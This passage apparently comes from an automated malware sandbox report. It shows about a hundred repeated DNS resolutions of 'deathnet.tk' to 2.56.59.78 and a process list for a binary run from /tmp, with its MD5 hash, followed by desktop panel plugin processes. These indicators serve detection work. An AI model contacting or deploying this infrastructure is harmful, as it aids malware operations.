              Mar 21, 2022 20:09:33.928157091 CET8.8.8.8192.168.2.230xd134No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:33.973953009 CET8.8.8.8192.168.2.230x413fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.021843910 CET8.8.8.8192.168.2.230x738bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.067596912 CET8.8.8.8192.168.2.230xae23No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.112812042 CET8.8.8.8192.168.2.230x60d5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.161039114 CET8.8.8.8192.168.2.230xbef9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.208467960 CET8.8.8.8192.168.2.230xdaedNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.253590107 CET8.8.8.8192.168.2.230x2d1fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.296431065 CET8.8.8.8192.168.2.230x8e9fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.341772079 CET8.8.8.8192.168.2.230xbe98No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.386073112 CET8.8.8.8192.168.2.230xb7e4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.429287910 CET8.8.8.8192.168.2.230xb9a3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.474124908 CET8.8.8.8192.168.2.230xbc1dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.517882109 CET8.8.8.8192.168.2.230x72c0No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.565680981 CET8.8.8.8192.168.2.230xe017No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.610348940 CET8.8.8.8192.168.2.230x7a87No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.658277988 CET8.8.8.8192.168.2.230x8b2dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.704602957 CET8.8.8.8192.168.2.230x8177No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.751482010 CET8.8.8.8192.168.2.230xa3e2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:34.797391891 CET8.8.8.8192.168.2.230xf87bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:35.851922989 CET8.8.8.8192.168.2.230x9499No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:35.897106886 CET8.8.8.8192.168.2.230x6d10No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:35.940573931 CET8.8.8.8192.168.2.230x470aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:35.983910084 CET8.8.8.8192.168.2.230xb838No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.028677940 CET8.8.8.8192.168.2.230x9777No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.071428061 CET8.8.8.8192.168.2.230x586No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.116498947 CET8.8.8.8192.168.2.230xcda9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.161433935 CET8.8.8.8192.168.2.230x4cafNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.206108093 CET8.8.8.8192.168.2.230x739bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.251158953 CET8.8.8.8192.168.2.230x7677No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.293659925 CET8.8.8.8192.168.2.230x3b69No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.337996960 CET8.8.8.8192.168.2.230x85e2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.383152962 CET8.8.8.8192.168.2.230x5782No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.426233053 CET8.8.8.8192.168.2.230x404aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.468976021 CET8.8.8.8192.168.2.230x6550No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.513674974 CET8.8.8.8192.168.2.230xf8a3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.556603909 CET8.8.8.8192.168.2.230x23cfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.598845959 CET8.8.8.8192.168.2.230x85a7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.643743038 CET8.8.8.8192.168.2.230x506cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.691282988 CET8.8.8.8192.168.2.230x22dfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.736774921 CET8.8.8.8192.168.2.230xd127No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.782872915 CET8.8.8.8192.168.2.230x4588No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.828171968 CET8.8.8.8192.168.2.230x4238No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.871982098 CET8.8.8.8192.168.2.230x890aNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.919575930 CET8.8.8.8192.168.2.230x61f6No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:36.965080976 CET8.8.8.8192.168.2.230x18d3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.008548021 CET8.8.8.8192.168.2.230x81d4No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.053005934 CET8.8.8.8192.168.2.230xf483No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.102881908 CET8.8.8.8192.168.2.230x2e52No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.148143053 CET8.8.8.8192.168.2.230x181No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.191538095 CET8.8.8.8192.168.2.230xf8f1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.234355927 CET8.8.8.8192.168.2.230xfb9fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.277489901 CET8.8.8.8192.168.2.230xaa9fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.322433949 CET8.8.8.8192.168.2.230xb618No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.371643066 CET8.8.8.8192.168.2.230x197eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.419066906 CET8.8.8.8192.168.2.230xa399No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.476149082 CET8.8.8.8192.168.2.230x4c1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.521264076 CET8.8.8.8192.168.2.230xf08fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.565608978 CET8.8.8.8192.168.2.230xdaf5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.610625029 CET8.8.8.8192.168.2.230xf35fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.657939911 CET8.8.8.8192.168.2.230xebc7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.707005978 CET8.8.8.8192.168.2.230x106eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.755069017 CET8.8.8.8192.168.2.230xbcfdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.803436995 CET8.8.8.8192.168.2.230x7f11No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.851522923 CET8.8.8.8192.168.2.230xdfb7No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.896914959 CET8.8.8.8192.168.2.230xb6c1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.943072081 CET8.8.8.8192.168.2.230x29c2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:37.987873077 CET8.8.8.8192.168.2.230xb79cNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.033449888 CET8.8.8.8192.168.2.230xd374No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.077383041 CET8.8.8.8192.168.2.230x74dcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.121824980 CET8.8.8.8192.168.2.230x5dfcNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.168339014 CET8.8.8.8192.168.2.230xaff3No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.214288950 CET8.8.8.8192.168.2.230xa0fdNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.261804104 CET8.8.8.8192.168.2.230x2facNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.309775114 CET8.8.8.8192.168.2.230xcaafNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.354837894 CET8.8.8.8192.168.2.230x2e17No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.400214911 CET8.8.8.8192.168.2.230x98a5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.443712950 CET8.8.8.8192.168.2.230xf0afNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.490572929 CET8.8.8.8192.168.2.230x1610No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.538893938 CET8.8.8.8192.168.2.230x7ae5No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.586267948 CET8.8.8.8192.168.2.230xc663No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.634211063 CET8.8.8.8192.168.2.230xa9bfNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.677009106 CET8.8.8.8192.168.2.230x259eNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.721787930 CET8.8.8.8192.168.2.230xff45No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.764224052 CET8.8.8.8192.168.2.230x6fd1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.808851004 CET8.8.8.8192.168.2.230xf209No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.853889942 CET8.8.8.8192.168.2.230x7358No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.901863098 CET8.8.8.8192.168.2.230x60b2No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.947184086 CET8.8.8.8192.168.2.230xc510No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:38.993479013 CET8.8.8.8192.168.2.230x3ffeNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.038440943 CET8.8.8.8192.168.2.230xa8e1No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.083419085 CET8.8.8.8192.168.2.230xfc7fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.130212069 CET8.8.8.8192.168.2.230xc275No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.178468943 CET8.8.8.8192.168.2.230x8794No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.225549936 CET8.8.8.8192.168.2.230x1587No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.270879984 CET8.8.8.8192.168.2.230xc19dNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.316296101 CET8.8.8.8192.168.2.230x2684No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.361699104 CET8.8.8.8192.168.2.230x1976No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.407385111 CET8.8.8.8192.168.2.230x2397No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.450489044 CET8.8.8.8192.168.2.230xcdf8No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.495269060 CET8.8.8.8192.168.2.230x7f1fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.544883966 CET8.8.8.8192.168.2.230x1fd9No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.590673923 CET8.8.8.8192.168.2.230x1850No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.637480974 CET8.8.8.8192.168.2.230x371fNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.684714079 CET8.8.8.8192.168.2.230x99acNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.731162071 CET8.8.8.8192.168.2.230xb166No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.779863119 CET8.8.8.8192.168.2.230xc94bNo error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.831419945 CET8.8.8.8192.168.2.230x7522No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              Mar 21, 2022 20:09:39.878110886 CET8.8.8.8192.168.2.230x6d71No error (0)deathnet.tk2.56.59.78A (IP address)IN (0x0001)
              • 2.56.59.78:80

              System Behavior

              Start time:20:07:31
              Start date:21/03/2022
              Path:/tmp/1XUdzc3d3i
              Arguments:/tmp/1XUdzc3d3i
              File size:4379400 bytes
              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
              Start time:20:07:35
              Start date:21/03/2022
              Path:/tmp/1XUdzc3d3i
              Arguments:n/a
              File size:4379400 bytes
              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
              Start time:20:07:35
              Start date:21/03/2022
              Path:/tmp/1XUdzc3d3i
              Arguments:n/a
              File size:4379400 bytes
              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
              Start time:20:07:35
              Start date:21/03/2022
              Path:/tmp/1XUdzc3d3i
              Arguments:n/a
              File size:4379400 bytes
              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
              Start time:20:07:35
              Start date:21/03/2022
              Path:/tmp/1XUdzc3d3i
              Arguments:n/a
              File size:4379400 bytes
              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
              Start time:20:07:35
              Start date:21/03/2022
              Path:/tmp/1XUdzc3d3i
              Arguments:n/a
              File size:4379400 bytes
              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
              Start time:20:07:35
              Start date:21/03/2022
              Path:/tmp/1XUdzc3d3i
              Arguments:n/a
              File size:4379400 bytes
              MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e
              Start time:20:07:38
              Start date:21/03/2022
              Path:/usr/bin/xfce4-panel
              Arguments:n/a
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784
              Start time:20:07:38
              Start date:21/03/2022
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76
              Start time:20:07:38
              Start date:21/03/2022
              Path:/usr/bin/xfce4-panel
              Arguments:n/a
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784
              Start time:20:07:38
              Start date:21/03/2022
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76
              Start time:20:07:38
              Start date:21/03/2022
              Path:/usr/bin/xfce4-panel
              Arguments:n/a
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784
              Start time:20:07:38
              Start date:21/03/2022
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76
              Start time:20:07:39
              Start date:21/03/2022
              Path:/usr/bin/xfce4-panel
              Arguments:n/a
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784
              Start time:20:07:39
              Start date:21/03/2022
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76
              Start time:20:07:39
              Start date:21/03/2022
              Path:/usr/bin/xfce4-panel
              Arguments:n/a
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784
              Start time:20:07:39
              Start date:21/03/2022
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76
              Start time:20:07:39
              Start date:21/03/2022
              Path:/usr/bin/xfce4-panel
              Arguments:n/a
              File size:375768 bytes
              MD5 hash:a15b657c7d54ac1385f1f15004ea6784
              Start time:20:07:39
              Start date:21/03/2022
              Path:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
              Arguments:/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
              File size:35136 bytes
              MD5 hash:ac0b8a906f359a8ae102244738682e76